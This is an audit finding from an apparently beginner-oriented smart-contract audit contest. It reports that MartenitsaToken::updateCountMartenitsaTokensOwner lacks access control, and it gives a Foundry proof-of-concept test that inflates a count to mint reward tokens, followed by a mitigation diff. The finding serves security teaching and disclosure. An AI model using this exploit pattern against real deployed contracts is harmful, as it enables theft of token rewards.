First Flight #13: Baba Marta
First Flight #13
Beginner FriendlyFoundryGameFi
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

`MartenitsaToken::updateCountMartenitsaTokensOwner` Missing Access Control

4rdiii

[H-3] MartenitsaToken::updateCountMartenitsaTokensOwner Missing Access Control

Description: The MartenitsaToken::updateCountMartenitsaTokensOwner function is designed to update the count of MartenitsaTokens owned by a user. However, due to the absence of access control, any user can call this function to arbitrarily increase their countMartenitsaTokensOwner, potentially allowing them to mint HealthTokens without actually owning any NFTs. This lack of access control can lead to significant security vulnerabilities and economic instability within the ecosystem.

function updateCountMartenitsaTokensOwner(
address owner,
string memory operation
@> ) external { // no access control - only marketplace should be able to call this!
if (
keccak256(abi.encodePacked(operation)) ==
keccak256(abi.encodePacked("add"))
) {
countMartenitsaTokensOwner[owner] += 1;
} else if (
keccak256(abi.encodePacked(operation)) ==
keccak256(abi.encodePacked("sub"))
) {
countMartenitsaTokensOwner[owner] -= 1;
} else {
revert("Wrong operation");
}
}

Impact: This vulnerability can enable users to artificially inflate their token counts and mint HealthTokens without any legitimate ownership of MartenitsaTokens, leading to an imbalance in the token economy. It can also be used to manipulate the marketplace and the value of HealthTokens, affecting the overall health and trust in the system.

Proof of Concept: Exploit Senario:

  1. Bob Calls updateCountMartenitsaTokensOwner 300 times.

  2. Bob collects rewards! equal to 100 tokens!

function testUpdateCountMartenitsaTokensOwnerMissesAccessControl() public {
vm.startPrank(bob);
for (uint256 i; i < 300; i++) {
martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
}
marketplace.collectReward();
assertEq(healthToken.balanceOf(bob), 100 ether);
}

Recommended Mitigation: Add access control to the updateCountMartenitsaTokensOwner function to ensure that only authorized users (e.g., marketplace contract) can call this function. This can prevent unauthorized users from manipulating their token counts.

function updateCountMartenitsaTokensOwner(
address owner,
string memory operation
) external {
+ require(
+ msg.sender == address(_martenitsaMarketplace),
+ "Unable to call this function"
+ );
if (
keccak256(abi.encodePacked(operation)) ==
keccak256(abi.encodePacked("add"))
) {
countMartenitsaTokensOwner[owner] += 1;
} else if (
keccak256(abi.encodePacked(operation)) ==
keccak256(abi.encodePacked("sub"))
) {
countMartenitsaTokensOwner[owner] -= 1;
} else {
revert("Wrong operation");
}
}
Updates

Lead Judging Commences

bube Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Missing access control

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.